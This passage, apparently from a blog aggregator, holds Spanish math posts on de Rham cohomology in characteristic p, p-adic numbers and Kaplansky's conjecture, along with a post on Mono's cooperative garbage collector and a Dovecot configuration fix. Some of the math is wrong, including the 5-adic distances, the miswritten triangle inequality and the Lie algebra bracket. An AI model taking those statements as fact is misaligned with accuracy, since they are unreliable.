Estas $latex d_j$ entre los módulos de diferenciales de orden $latex j$ y  $latex j+1$ pueden demostrar que son derivaciones, y denotamos como $latex \Omega^{\bullet}_{A/\mathbb{K}}$ al complejo de cadenas resultante con su respectivo operador de frontera en cada flecha dado por $latex d_j$.

$latex \cdots\xrightarrow{d_{k-1}}\Omega^{k-1}_{A/\mathbb{K}}\xrightarrow{d_{k}} \Omega^k_{A/\mathbb{K}}\xrightarrow{d_{k+1}} \Omega^{k+1}_{A/\mathbb{K}}\xrightarrow{d_{k+2}}\cdots$

Pueden demostrar que en efecto $latex d_{k+1}\circ d_k =0$ por lo que $latex \text{Im}{d_k}\subseteq \ker d_{k+1}$, que es lo fundamental para construir la teoría de cohomología.

Definición: El complejo de DeRham para la $latex \mathbb{K}$-álgebra $latex A$ está dado por el complejo de cadenas $latex \Omega^{\bullet}_{A/\mathbb{K}}$ donde su i-ésimo grupo de Cohomología está definido como: 

$latex H^{i}_{dR}(A/\mathbb{K}):=H^{i}(\Omega^{\bullet}_{A/\mathbb{K}})=\ker{d_{i+1}}/\text{Im} d_{i}$

Nota que si $latex \space i> KrullDim(A)=Dim(X)$ por las propiedades del producto cuña $latex \wedge$ tendrás dependencia lineal por lo que $latex \Omega^i_{A/\mathbb{K}=0$ que implica que $latex H^i(A/\mathbb{K})=0$ , nota que podemos generalizar esta construcción a esquemas de tipo finito por lo que es mejor denotar $latex H^{i}_{dR}(X/\mathbb{K}):=H^{i}_{dR}(A/\mathbb{K})$ donde $latex X=Spec(A)$ , esto es la generalización usando el espectro del anillo y lo tengo explicado aquí con ejemplos, pero si no te gusta esto, o te es muy complicado, sigue usando el anillo $latex A$.


Cohomología en característica p

Vamos a jugar un poco con esta cohomología y supongamos ahora que $latex \mathbb{K}=\mathbb{F}_p$, queremos definir una teoría de cohomología para variedades sobre $latex \mathbb{F}_p$ , el punto aquí será definir una teoría de cohomología con coeficientes en un campo de característica 0 relacionado muy cercanamente con $latex \mathbb{F}_p$ para una variedad afín sobre $latex \mathbb{F}_p$.

Primero, observemos por qué el párrafo anterior, considera $latex X=\mathbb{P}^1_{\mathbb{F}_p}$ es decir $latex A=\mathbb{F}_p[X]=\mathbb{F}_p[x]$, es fácil ver que $latex H^{1}_{dR}(A/\mathbb{F}_p)$ es un $latex \mathbb{F}_p$-espacio vectorial de dimensión infinita ya que por ejemplo $latex d_1(x^{pk})=0$ $latex \forall k\geq 0$ por lo que $latex \lbrace x^{pk-1}dx \rbrace_{k\geq 0} \not\subset \text{Im }d_1$ y $latex \lbrace x^{pk-1}dx \rbrace_{k\geq 0}\subset \Omega_{A/\mathbb{F}_p}$  $latex \forall k\geq 0$
  
O sea tenemos que $latex d_1:A\rightarrow \Omega^{1}_{A/\mathbb{F}_p}$ está dado por $latex f\mapsto df$ y $latex d_2:\Omega^{1}_{A/\mathbb{F}_p}\rightarrow \Omega^{2}_{A/\mathbb{F}_p}$ está dado por $latex gdf\mapsto dg\wedge df$.

Con esto anterior y la observación de que $latex x^{pk-1}dx\notin \text{Im }d_1$ tenemos que:

$latex \ker d_2=\langle \lbrace cdf : f\in A,\text{ }\forall c\in\mathbb{F}_q\rbrace \cup \lbrace cx^{pk}df : k\geq 0\rbrace\rangle$

$latex \text{Im }d_1=\langle \lbrace df \in \Omega^{1}_{A/\mathbb{F}_q} : f=cx^{pk+r},\text{ }r\neq -1\rbrace\rangle$

Por lo tanto:

$latex H^{1}_{dR}(A/\mathbb{F}_q)=\ker d_{2}/\text{Im }d_{1}$

Es como $latex \mathbb{F}_p$-espacio vectorial tiene una infinidad de generadores dados por todos los valores que puede tener $latex k\geq 0$ ya que la Imágen de $latex d_1$ está totalmente contenida en la parte izquierda del kérnel de $latex d_2$ y la parte derecha es infinita.

Esto es un problema... tenemos que de hecho $latex \Omega^{1}_{A/\mathbb{F}_p}$ tiene dimensión infinita, esto no nos sirve de nada, es muy grande, necesitamos deshacernos de la característica $latex p$ que nos da problemas con las derivaciones de funciones polinomiales con exponente múltiplo de $latex p$.

El campo de característica 0 que usaremos es $latex \mathbb{Q}_p$ (campo de p-ádicos que lo puedes ver explicado en mi blog aquí )y considera su anillo de enteros asociado $latex \mathbb{Z}_p$ , es bien conocido que $latex \mathbb{Z}_p/p\mathbb{Z}_p\cong \mathbb{F}_p$, 

Supón que tienes una $latex \mathbb{F}_p$-álgebra $latex A$ , entonces si pudieramos encontrar una $latex \mathbb{Z}_p$-álgebra suave $latex \tilde{A}$ con $latex \tilde{A}\otimes_{\mathbb{Z}_p}\mathbb{F}_p\cong A$ podrías considerar la cohomología de DeRham de la $latex \mathbb{Q}_p$-álgebra $latex \tilde{A}_{\mathbb{Q}_p}:=\tilde{A}\otimes_{\mathbb{Z}_p}\mathbb{Q}_p$

Con esto, ya nos deshacemos de la dimensión infinita, pero el problema es que levantar (lift) el álgebra $latex A$ como $latex \mathbb{Z}_p$-álgebra da diferentes grupos de cohomología , aunque finitos pero diferentes y necesitamos una manera de poder encontrar un lifting único que nos sirva para poder aplicar el teorema del punto fijo.

Por ejemplo si $latex A=\mathbb{F}_p[x]$ y $latex \tilde{A}_1=\mathbb{Z}_p[x]$ , $latex \tilde{A}_2=\mathbb{Z}_p[x,y]/\langle (1+px)y-1 \rangle$, puedes verificar que $latex H^1_dR(\tilde{A}_{1,\mathbb{Q}_p}/\mathbb{Q}_p)=0$ y $latex H^1_dR(\tilde{A}_{2,\mathbb{Q}_p}/\mathbb{Q}_p)$ tiene dimensión 1

Como vemos, tenemos dos liftings de $latex A$ con diferente grupo de cohomología.

Vamos a seguir después con el anillo en el que queremos trabajar la cohomología, para aplicar el teorema del punto fijo de Lefschetz por ahora nos quedamos aquí.

Después le seguimos, espero les haya interesando.

Eduardo Ruíz Duarte (beck)
twitter: @toorandom


Eduardo Ruiz Duarte

Eduardo Ruiz Duarte
beck's site

Geometría p-ádica, completación de racionales y estructura de campo

¿Cómo podemos llegar a los números reales desde los números racionales?

Esta estructura es muy importante para estudiar muchos teoremas de geometría algebraica, y sirve como un ejemplo interesante ajeno a los campos usuales, todo estudiante de posgrado orientado a álgebra creo que debe conocerlos, aquí pongo una mini-introducción sólo para que te adentres más.


Tenemos que los números racionales son los cocientes de enteros, es decir:

$latex \mathbb{Q}=\Big \lbrace \frac{a}{b} : a,b\in\mathbb{Z}, b\neq 0 \Big \rbrace$

Ya sabemos como sumar y multiplicar fracciones, y sabemos que cada fracción tiene un inverso (excepto el 0) es decir, $latex (\mathbb{Q},+.\times)$ forma un campo.


Para entender los números p-ádicos necesitamos entender valores absolutos

Valores absolutos

Definición: Sea $latex \mathbb{K}$ un campo y $latex \mathbb{Q}_{+}=\big \lbrace x\in \mathbb{Q} : x\geq 0\big \rbrace$, entonces un valor absoluto en $latex \mathbb{K}$ es una función:

$latex \mid \cdot \mid:\mathbb{K}\rightarrow \mathbb{Q}_{+}$

Que satisface lo siguiente:


* $latex \mid x \mid = 0 \Leftrightarrow x=0$
* $latex \mid xy \mid = \mid x \mid \mid y \mid$
* $latex \mid x+y\mid \leq \mid x \mid + \mid y \mid$   (Desigualdad del triángulo)

Ejemplo usual:

Un valor absoluto para $latex \mathbb{Q}$ es:

$latex \mid \cdot \mid:\mathbb{Q}\rightarrow \mathbb{Q}_{+}$

$latex \mid x \mid =\begin{cases} \enspace x: & x\geq 0 \\ -x: & x < 0 \end{cases}$


Es fácil verificar que satisface las condiciones anteriores.


Ahora démosle más estructura al espacio, viendo cómo podemos comparar elementos.


Espacios Métricos

Decimos que una métrica es una función de distancia, es decir , si $latex \mathbb{X}$ es un conjunto entonces una métrica sobre $latex \mathbb{X}$ es una función:


$latex \delta:\mathbb{X}\times \mathbb{X} \rightarrow \mathbb{Q}_{+}$

Que satisface lo siguiente:

*$latex \delta(x,y)\geq 0$
*$latex \delta(x,y)=\delta(y,x)$
*$latex \delta(x,y)+\delta(y,z)\geq \delta(z,y)$ (desigualdad del triángulo)


Si se fijan hasta aquí, tenemos que si son observadores, $latex \mathbb{Q}$ forma un espacio métrico con la distancia usual , es decir:

$latex (\mathbb{Q},\mid \cdot \mid)$ es un espacio métrico , donde la métrica $latex \delta$ está definida usualmente como:

$latex \delta:\mathbb{Q}\times \mathbb{Q}\rightarrow \mathbb{Q}_{+}$
$latex \delta(x,y)=\mid x-y\mid$

Es decir la distancia que separa a los puntos $latex x,y\in \mathbb{Q}$

Para poder completar todos los huecos de $latex \mathbb{Q}$ necesitamos saber lo que son las sucesiones de Cauchy


Sucesiones de Cauchy


Una sucesión de Cauchy en un espacio métrico $latex \mathbb{X}$ es una sucesión de elementos $latex x_1,x_2,... \in \mathbb{X}$ de tal manera que cada uno de los elementos se van volviendo más cercanos conforme esta sucesión crece.

Es decir

$latex x_1,x_2,x_3,...$  es una sucesión de Cauchy si para todo número real positivo $latex \epsilon$ existe un entero $latex N$ de tal que para todos los números $latex n,m\in \mathbb{N}$ con $latex n,m > N$

$latex \delta(x_m,x_n)=\mid x_m -x_n\mid < \epsilon$



Esto quiere decir que siempre que se te ocurra cualquier real $latex \epsilon > 0$ por más chiquito que quieras, siempre podrás encontrar un índice $latex N$  donde todos los índices $latex n,m$ mayores que $latex N$ están a distancia menor que $latex \epsilon$


Puedes visualizarlo así... si se fijan los elementos $latex x_i$ se van juntando cada vez más y aunque escoja $latex \epsilon = \frac{1}{10^{100^{100}}}$ siempre sucederá que existe una $latex N$ que todos los elementos con índice mayor a $latex N$ están a distancia menor que $latex \epsilon$, entonces si una sucesión cumple esto, decimos que es de Cauchy, un ejemplo es $latex \Big \lbrace \frac{1}{n} \Big \rbrace_{n=1}^{\infty}$


$latex \mathbb{X}$




Ahora para juntar todo esto , veamos que es un espacio métrico completo.



Definición: Decimos que un espacio métrico $latex (\mathbb{X},d)$ es completo si toda sucesión de Cauchy en $latex (\mathbb{X},d)$ converge EN $latex \mathbb{X}$


Antiejemplos:

Es decir , por ejemplo si $latex \mathbb{X}=(0,1]$  vemos que la sucesión anterior $latex \Big \lbrace \frac{1}{n} \Big \rbrace_{n=1}^{\infty}$ converge a $latex 0\notin \mathbb{X}$ por lo que en este caso $latex \mathbb{X}$ no es completo.


Ahora... también tenemos que los números racionales con la métrica usual tampoco son completos es decir $latex (\mathbb{Q},\mid \cdot \mid)$

Es construir una sucesión de Cauchy en $latex \mathbb{Q}$ que no converja, por ejemplo.


$latex \Big \lbrace 3,3.1,3.14,3.141,3.1415,3.14159,3.14159295,...\Big \rbrace$


Esta claramente es una sucesión de números racionales que converge a $latex \pi \notin \mathbb{Q}$

Por lo que $latex \mathbb{Q}$ no es completo con la métrica usual


Ahora, Si un espacio no es completo, podemos completarlo agregando todos los límites de sucesiones de Cauchy de éste, y pueden probar que el completar un campo (en este caso $latex \mathbb{Q}$) el resultado les da otro campo (en este caso $latex \mathbb{R}$)


Resumen

Si quieres obtener $latex \mathbb{R}$ lo que necesitas es a $latex \mathbb{Q}$ , un valor absoluto en éste $latex \mid \cdot \mid$ , una métrica $latex \delta$ y todas las sucesiones de Cauchy en $latex \mathbb{Q}$ con respecto $latex \delta$


Otros Valores Absolutos  (p-ádicos)

Hasta ahora todo esto es lo usual y aburrido, la función de valor absoluto ya la conocemos perfectamente, lo que queremos hacer es usar otras funciones de valor absoluto y ver cómo se comportan estos espacios bajo una nueva métrica.


Fijemos un número primo $latex p$ , definiremos un valor absoluto asociado a $latex p$ en $latex \mathbb{Q}$

Sea $latex \alpha \in \mathbb{Q}^{\times}$ entonces tenemos que existen $latex g,h$ primos relativos tal que:

$latex \alpha = p^{n}\frac{g}{h}$

Es decir, todo número racional podemos verlo como múltiplo de $latex p^n$  donde $latex p$ no divide a ninguno de los $latex g,h$ , es decir todos son primos relativos.

Esto es fácil observarlo y demostrarlo, ahora vemos ejemplos , pero definimos el valor absoluto p-ádico para $latex \alpha \in \mathbb{Q}^{\times}$ como:

$latex \mid \alpha \mid_{p}=\mid p^{n}\frac{g}{h}\mid_p = p^{-n}$

Este es un valor absoluto no trivial y cumple todas las reglas de valor absoluto que definimos anteriormente con las leyes de los exponentes, hay que definir $latex \mid 0 \mid_p=0$ y hay que notar que el conjunto de valores absolutos es discreto ya que cae en el conjunto $latex \lbrace p^n : n\in \mathbb{Z}\rbrace \cup \lbrace 0 \rbrace$

Ejemplo:

Consideremos $latex \alpha = \frac{140}{297}=2^{2}\cdot 5 \cdot 7 \cdot 3^{-3} \cdot 11^{-1}$

Entonces:

$latex \mid \alpha \mid_2 = \frac{1}{4}$
$latex \mid \alpha \mid_3 = 27$
$latex \mid \alpha \mid_5 = \frac{1}{5}$
$latex \mid \alpha \mid_7 = \frac{1}{7}$
$latex \mid \alpha \mid_{11} = 11$
$latex \mid \alpha \mid_{13} = 1$


Métrica p-ádica en $latex \mathbb{Q}$

Naturalmente tenemos que la métrica p-ádica en los racionales definida como


$latex \delta_p:\mathbb{Q}\times\mathbb{Q} \rightarrow \mathbb{Q}_{+}$

está definida como

$latex \delta_p(x,y)=\mid x-y\mid_p$


Ejemplo contraintuitivo

Aquí las cosas no son tan intuitivas porque podemos ver que por ejemplo si $latex p=7$ $latex 28814$ y $latex 2$ están más cercanos que $latex 3$ y $latex 2$ ya que


$latex \delta_7(28814,2)=\mid 28812\mid_7 = \mid 2^2\times 3 \times 7^4\mid_7 = 7^{-4}=\frac{1}{2401}$

$latex \delta_7(3,2)=\mid 1 \mid_7 = \mid 7^0 \mid_7 = 7^0 = 1$

como $latex 1 > \frac{1}{2401}$ tenemos que $latex 3$ está más alejado del $latex 2$ que $latex 28814$



Completación de $latex \mathbb{Q}$ con la métrica p-ádica


$latex \mathbb{Q}$ no es completo con respecto a esta métrica, veamos un ejemplo

si $latex p=5$

$latex \displaystyle \sum_{n=0}^{\infty}{ 5^n}$

No es un elemento de $latex \mathbb{Q}$ pero ...

la sucesión:

$latex \lbrace 1,1+5,1+5+5^2, 1+5+5^2+5^3,...\rbrace = \lbrace 1,6,31,156\rbrace$

Es una sucesión de Cauchy con la métrica 5-ádica , esta sucesión con la métrica usual NO converge, pero con la métrica 5-ádica sí, de hecho las distancias van siendo $latex 1,\frac{1}{2},\frac{1}{4},\frac{1}{8}...$ .


Entonces para cada primo $latex p$ hay una completación de $latex \mathbb{Q}$ con respecto a su métrica p-ádica asociada

Entonces como sabemos que la completación del campo $latex \mathbb{Q}$ también será un campo.

y este objeto le llamamos campo de los números p-ádicos y lo denotamos como:

$latex \mathbb{Q}_p$

para algún primo $latex p$.

Representación de los números p-ádicos

Tenemos que todo número $latex x\in \mathbb{Q}_p$ puede ser representado como la serie de potencias:


$latex x_{-m}p^{-m}+x_{-m+1}p^{-m+1}+...+x_0+x_1p+x_2p^2+x_3p^3+...$


Esta representación es única cuando $latex x_i \in \mathbb{Z}/p\mathbb{Z}$ es decir , si $latex x_i$ está módulo $latex p$

La colección de las $latex \lbrace x_i \rbrace$ son los dígitos p-ádicos y la notación para escribirlos es de izquierda a derecha

$latex ...x_{3}x_{2}x_{1}x_{0} . x_{-1}x_{-2}...x_{-m+1}x_{-m}$


Geometría de $latex \mathbb{Q}_p$



Para finalizar vamos a ver cómo se ven las bolas de radio $latex r$ con centro en $latex a$ en $latex \mathbb{Q}_p$

es decir , queremos analizar estos objetos:

$latex B(a,r) = \lbrace x\in \mathbb{Q}_p : \mid a-x\mid_p < r\rbrace$


Como $latex r\in \lbrace p^n : n\in \mathbb{Z}$ si $latex p=3$ en $latex \mathbb{Q}_3$



Donde el círculo más grande tiene $latex r=1$ y los 3 circulitos que siguen tienen $latex r=1/3$ y así $latex r=1/3^n$

Pero si ponemos un microscopio, lo que veremos es:



que es como un arbol ternario.

Espero les haya servido, estos aparte de ser divertidos son bellos, ahora podríamos hablar en el futuro a detalle de topología con esto.


Eduardo Ruíz Duarte (beck)
twitter: @toorandom

Martes 22 de diciembre de 2015

Miguel de Icaza

Miguel de Icaza
Miguel de Icaza

Mono's Cooperative Mode for SGen GC

Mono's master tree now contains support for a new mode of operation for our garbage collector, we call this the cooperative mode. This is in contrast with the default mode of operation, the preemptive mode.

This mode is currently enabled by setting the MONO_ENABLE_COOP environment variable.

We implemented this new mode of operation to make it simpler to debug our GC, to have access to more data on the runtime during GC times and also to support certain platforms that do not provide the APIs that our preemptive system needed.

Behind Preemptive Mode

When we started building Mono back in 2001, we wanted to get something up and running very quickly. The idea was to have enough of a system running on Linux that we could have a fully self-hosting C# environment in a short period of time, and we managed to do this within eight months.

We were very lucky when it came to garbage collection that the fabulous Boehm GC existed. We were able to quickly add garbage collection to Mono, without having to think much about the problem.

Boehm is fabulous because it does not really require the cooperation of the runtime to work. It is a garbage collector that was originally designed to add garbage collection capabilities to programs written in C or C++. It performs garbage collection without much developer intervention. And it achieves this for existing code: multi-threaded, assembly-loving, low-level code.

Boehm GC is a thing of beauty.

Boehm achieves its magic by pulling some very sophisticated low-level tricks. For example, when it needs to perform a garbage collection it relies on various operating system facilities to stop all running threads, examine the stacks for all these threads to gather roots from the stack, perform the actual GC job then resume the operation of the program.

While Boehm is fantastic, in Mono, we had needs that would be better served with a custom garbage collector. One that was generational and reduced collection times. One fit more closely with .NET. It was then that we built the current GC for Mono: SGen.

SGen has grown by leaps and bounds and has been key in supporting many advanced scenarios on Android and iOS as well as being a higher performance and lower latency GC for Mono.

When we implemented SGen, we had to make some substantial changes to Mono's code generator. This was the first time that Mono's code generator had to coordinate with the GC.

SGen kept a key feature of Boehm: most running code was blissfully unaware that it could be stopped and resumed at any point.

This meant that we did not have to do too much work to integrate SGen into Mono [1]. There are two main downsides with this.

The first downside is that we still required the host platform to support some mechanism to stop, resume and inspect threads. This alone is pretty obnoxious and caused much grief to developers porting Mono to strange platforms.

The second downside is that code that runs during the collection is not really allowed to use many of the runtime APIs or primitives, because the collector might be running in parallel to the regular code. You can only use reentrant code.

This is a major handicap for development and debugging of the collector. One that is just too obnoxious to deal with and one that has wasted too much of our time.

Cooperative Mode

In the new cooperative mode, the generated code is instrumented to support voluntarily stopping execution

Conceptually, you can think of the generated code as one that basically checks on every back-branch, or every call site that the collector has requested for the thread to stop.

The supporting Mono runtime has been instrumented as well to deal with this scenario. This means that every API that is implemented in the C runtime has been audited to determine whether it can run in a finite amount of time, or if it is a blocking operation and adjusted to participate accordingly.

For methods that run in a finite amount of time, we just wait for them to return back to managed code, where we will stop.

For methods that might potentially block, we need to add some annotations that inform our GC that it is safe to assume that the thread is not running any mutating code. Consider the internal call that implements the CreateDirectory method. It now has been decorated with MONO_PREPARE_BLOCKING and MONO_FINISH_BLOCKING to delimit blocking code.

This means that threads do not stop right away as they used to, but they stop soon enough. And it turns out that soon enough is good enough.

This has a number of benefits. First, it allows us to support platforms that do not have enough system primitives to stop, resume and examine arbitrary threads. Those include things like the Windows Store, WatchOS and various gaming consoles.

But selfishly, the most important thing for us is that we will be able to treat the garbage collector code as something that is a first class citizen in the runtime: when the collector works, it will be running in such a state that accessing various runtime structures is fine (or even using any tasty C libraries that we choose to use).

Today

As of today, Mono's Coop engine can either be compiled in by default (by passing --with-cooperative-gc to configure), or by setting the MONO_ENABLE_COOP environment variable to any value.

We have used a precursor of Coop for about 18 months, and now we have a fully productized version of it on Mono master and we are looking for developers to try it out.

We are hoping to enable this by default next year. [1] Astute readers will notice that it still took years of development to make SGen the default collector in Mono.

HowTo: Fixing Dovecot 2.2 in CentOS 7.2

Warning: If you update dovecot on CentOS 7, it will brake! You need to update one of the config files in order for it to keep working:

# /etc/dovecot/conf.d/15-mailboxes.conf
...
namespace inbox {
    ...
    inbox = yes
    ...
}
...

So, basically, you need to add inbox = yes within the inbox namespace.

Eduardo Ruiz Duarte

Eduardo Ruiz Duarte
beck's site

Conjetura de Kaplansky, grupos y anillos de grupo

Hay un problema que lleva 25 años sin resolverse y fue descubierto por Irving Kaplansky, es de esos problemas que se ven bien fáciles de atacar pero pues resulta que no es tan fácil, yo me topé en mi trabajo de investigación para criptografía en variedades con un anillo de grupo que quería ver si tenía múltiplos de 0, y al leer literatura me topé con esto que es muy interesante y que yo tendré que demostrar en mi caso particular.

Veremos un functor de la categoría de grupos a anillos (de hecho módulos), es decir, podemos asociar un anillo a todo grupo.

La conjetura dice lo siguiente:

Conjetura: (Kaplansky)
Sea $latex \mathbb K$ un campo y $latex G$ un grupo libre de torsión, entonces el  anillo de grupo $latex \mathbb{K}[G]$ no tiene divisores de $latex 0$ es decir es un dominio

Para entender este enunciado vamos a definir todo y construir $latex \mathbb{K}[G]$

Vamos a recordar todos los conceptos necesarios de esta conjetura a través de ejemplos no tan triviales de cada uno de los conceptos para poder adquirir intuición en la conjetura.

Grupos, anillos, campos, torsión a través de ejemplos

Grupos (no abelianos son los interesantes)

Un grupo $latex (G, \cdot)$ es un conjunto con una operacion binaria que cumple
a) Existe un $latex e\in G$ tal que $latex \forall g\in G$ tenemos que $latex g\cdot e=e\cdot g = g$ (hay neutro)
b) Si $latex g\in G$ entonces $latex \exists h$ tal que $latex h\cdot g =g\cdot h=e$ (todos son invertibles)
c) Si $latex g_1,g_2\in G$ entonces $latex g_1\cdot g_2 \in G$ (es cerrado)
d) Si $latex g_1,g_2,g_3\in G$ entonces $latex (g_1\cdot g_2)\cdot g_3=g_1\cdot (g_2\cdot g_3)$ (es asociativo)
e)* si sucede que $latex \forall g_1,g_2 \in G$ tenemos que $latex g_1\cdot g_2=g_2\cdot g_1$  (es conmutativo) decimos que $latex G$ es un grupo abeliano


Ejemplos:

No-Ejemplo:

Las matrices con la multiplicación no forman un grupo ya que hay algunas que tienen determinante 0 y no son invertibles, por lo que no se cumple la propiedad b

$latex (Mat_{n}\mathbb R,\cdot)$

Ejemplo $latex SL_2(\mathbb C)$

Las matrices sobre un campo, por ejemplo $latex \mathbb C$ de nxn cuyo determinante es 1 se les denota como $latex SL_n\mathbb C$ , es claro que es un grupo con la multiplicación de matrices ya que todos son invertibles, este se llama grupo especial lineal, y es "especial" porque es de hecho un subgrupo normal de otro mas grande que se llama $latex GL_n\mathbb C$ que es el grupo general lineal que consta de todas las matrices invertibles, es fácil mostrar que un subgrupo normal para los que saben un poco más de teoría de grupos , sabemos que el kernel de un morfismo de grupos es siempre un subgrupo normal y en este caso el operador de determinante induce un homomorfismo de grupos, en este caso $latex det:GL_n\mathbb{C} \rightarrow \mathbb{C}^{\times}$ donde $latex \mathbb{C}^\times$ es el grupo multiplicativo de los complejos sin el 0, entonces, $latex Ker(det)=\lbrace A\in GL_n\mathbb C\mid det(A)=1\rbrace=SL_n\mathbb C$, de hecho si te gusta la geometría diferencial hay más en este grupo que ya me extendí mucho en el ejemplo pero tenemos que existe un álgebra de Lie (haces nacer un espacio vectorial donde se pueden multiplicar vectores junto con una operación especial llamada corchete de Lie ) de $latex SL_n\mathbb C$ que es $latex \mathfrak{sl}_n\mathbb C =\lbrace A\in SL_n\mathbb C \mid Tr(A)=0\rbrace$ donde el corchete de Lie es la multiplicación de estos elementos dado por $latex [g,h]=g^{-1}h^{-1}gh$

La teoría en este grupo es hermosa y es favorita de muchos ultra-ingenieros (teoría de control) y de muchos físicos ya que tiene un entendimiento muy profundo, el hecho de que todos tengan determinante 1, y el determinante representar un polinomio con entradas en la matriz te dice que de hecho los elementos pertenecen a una variedad que se sumerge en un espacio y tiene cierta topología y se le da una interpretación a este grupo como el que preserva volúmenes y orientación con transformaciones de $latex \mathbb{C}^n$ (puedes usar $latex \mathbb R$) donde el determinante mide el cambio en volumen y orientación.


Otro grupos con funciones $latex S_n$

Otros ejemplos de grupos más aburridos pueden ser los números reales con la suma usual, o los reales sin el 0 con la multiplicación , estos son abelianos, otros más divertidos no conmutativos son las permutaciones $latex S_n$ que consta de todas las funciones que permutan $latex n$ elementos y su operación es la composición de estas funciones, por ejemplo si hacemos actuar a este grupo en el conjunto $latex X=[ 1,2,3 ]$ tenemos que hay un $latex \sigma_1\in S_3$ tal que intercambia los dos primeros, hay otro $latex \sigma_2$ que intercambia el primero por el tercero, y hay uno que no hace nada, por ejemplo $latex \sigma_1(X)=[2,1,3]$ y $latex \sigma_2(X)=[3,2,1]$ y $latex \sigma_1\circ \sigma_2(X)=[2,3,1]$ y $latex \sigma_2\circ \sigma_1(X)=[3,1,2]$ , este es un grupo (no abeliano) de $latex n!$ elementos , en este ejemplo tiene 6 elementos, toma en cuenta que consta de funciones y hay varios subgrupos de estos, que miden simetria, por ejemplo el grupo de las rotaciones de un cuadrado, donde no se vale por ejemplo intercambiar solo 2 vertices ya que "romperias el cuadrado" , o simplemente las rotaciones de un icosaedro, o un simplejo en dimensión 4, et cétera, hay otro tipo de grupos que alguna vez expuse aquí que se llama grupo de trenzas que tiene que ver con teoría de nudos, lo puedes explorar aquí en mi blog.

Campos

Un campo es sólo una estructura que consta de un conjunto y que contiene dos operaciones cerradas en el conjunto relacionadas con la ley distributiva donde el conjunto con cada operación por sí misma forma un grupo abeliano (por ejemplo $latex (\mathbb R ,+ , \times)$  o $latex (\mathbb {F}_q,+,\times)$ pero no $latex (\mathbb{Z},+,\times)$ ya que los enteros  con la multiplicación sólo tienen al 1 y -1 con inverso, los demás no por lo que no forma grupo abeliano con $latex \times$), hay campos más interesantes, por ejemplo todos los cocientes de polinomios en una variable $latex x$ sobre un campo $latex \mathbb K$ se le denota como $latex \mathbb K (x)$ donde un elemento de ahí puede ser $latex \frac{x^2-x}{x^3-x^2+1}$ estos campos de funciones polinomiales son interesantes cuando los haces en más variables y los elementos cumplen estar definidos sobre una superficie o una curva, y limitas que los denominadores de las funciones polinomiales no se anulen en algún punto de la curva (podrás encontrar un campo diferente para cada punto, eso le da una estructura muy rica a una curva algebraicamente), todo esto sigue conservando la estructura de campo y se puede estudiar la superficie/curva desde ciertas propiedades de este campo sin acudir ya a la geometría.


Anillos y dominios enteros

Un Anillo es como un campo pero a la operación multiplicativa no le pides que tenga inversos, por ejemplo las matrices cuadradas sin pedir condiciones al determinante forman un anillo de hecho forman un grupo con la adición, los polinomios también son un anillo conmutativo, et cétera.


Un anillo $latex R$ se dice que es un dominio entero si $latex \forall a,b\in R\setminus \lbrace 0 \rbrace$ se tiene que $latex a\cdot b \neq 0$

Por ejemplo $latex Mat_2\mathbb Z$ no es un dominio entero ya que $latex \begin{pmatrix} 1 & 0 \\ 1 & 0 \end{pmatrix} \begin{pmatrix} 0 & 0 \\ 1 & 1 \end{pmatrix} = \begin{pmatrix} 0 & 0 \\ 0 & 0 \end{pmatrix}$.

También tenemos que los polinomios con coeficientes en un campo si son un dominio entero, ya que no hay dos polinomios no nulos que al multiplicarse te den 0

Otro no-ejemplo son los enteros módulo un número NO-primo, por ejemplo $latex (\mathbb Z/(10),+,\cdot)$  donde la suma y multiplicación es la usual módulo 10 (esto es de manera intuitiva que $latex a\cdot b = c$ donde $latex c$ es el residuo de la división $latex \frac{a\cdot b}{10}$, esta estructura es un anillo pero no es un dominio ya que por ejemplo $latex 5\cdot 2 \equiv 0 \bmod 10$ pero si lo hicieramos con un número primo $latex (\mathbb Z/(p),+,\cdot)$ por la naturaleza de $latex p$ no vas a encontrar dos números que multiplicados te den $latex p$ entonces no existirán "residuos 0" al multiplicar dos números y dividir entre $latex p$ , pero bueno de hecho esto ya es más que un anillo, es un campo finito, todos son invertibles, lo puedes demostrar si tienes ganas.

Un grupo $latex G$ se dice que es libre de torsión si al iterar $latex n$ veces su operación con cualquier elemento $latex g\in G\setminus \lbrace e\rbrace$  no te da nunca el neutro de la operación $latex e\in G$ para todo $latex n\in \mathbb N$ , es decir, un grupo $latex G$ es libre de torsión si el elemento neutro es el único elemento de orden finito

Torsión en grupos

Por ejemplo TODOS los grupos finitos NO son libres de torsión, ya que iterar en un $latex g\in G$ te da elementos de un subgrupo generado por $latex g$ denotado por $latex (g)$ y su cardinalidad divide la cardinalidad de $latex G$ entonces $latex e\in (g)$ incluye a $latex e\in G$ por lo que todos los elementos tienen torsión.

Con esto ya excluimos TODA una familia de grupos de la conjetura de Kaplansky, ya que pedimos que sea infinito y sin torsión, por lo que todos los campos de característica p (que también son grupos) también quedan excluidos, y aquí es donde vamos viendo que todo se dificulta ya que los grupos a tratar deben ser más complicados, un grupo aburrido libre de torsión pues son los enteros $latex (\mathbb{Z},+)$ donde sumar nunca da 0 , las matrices tienen torsión ya que hay matrices que al elevarlas a la $latex n$ se anulan por ejemplo las matrices de 2x2 con coeficientes en el campo finito $latex \mathbb Z/(2)$ con la multiplicación tenemos que $latex \begin{pmatrix} 1 & 1 \\ 0 & 1 \end{pmatrix}^2=\begin{pmatrix} 1 & 0 \\ 0 & 1 \end{pmatrix}$ es la matriz identidad , por lo que ese elemento tiene orden 2


Conjetura de Kaplansky

La conjetura propone construir un anillo dado un campo y un grupo  y estudiar si es o no un dominio entero

Construcción de un anillo asociado a un grupo $latex G$ y un campo $latex \mathbb K$ 


Lo que haremos es construir un anillo desde un grupo denotado como $latex \mathbb{K}[G]$, es decir, tendremos que construir una suma y una multiplicación que cumpla todos los axiomas.

Grupos generados desde cualquier conjunto (Grupo libre abeliano)

Ya estamos casi listos con las definiciones aposteriori con los ejemplos, vamos a construir un grupo dado un conjunto cualquiera, imaginen que tenemos el conjunto $latex A=\lbrace \alpha,\beta,\gamma\rbrace$, si nos preguntaran cómo podríamos construir un $latex \mathbb K$ espacio vectorial  $latex V$ con el conjunto $latex A$ lo más adecuado es tomar las todas las combinaciones de sumas formales $latex k_1\alpha + k_2 \beta + k_3 \gamma$ $latex \forall k_i\in \mathbb K$, podemos generalizar esto apra cualquier conjunto de distinta cardinalidad, incluso infinita bajo ciertas condiciones (como por ejemplo que sólo un número finito de $latex k_i$ sean distintas de cero) y vamos a hacer más compacta la notación y a los elementos del campo vamos a ponerles un índice que nos indicará a qué elemento del conjunto está multiplicando, entonces:


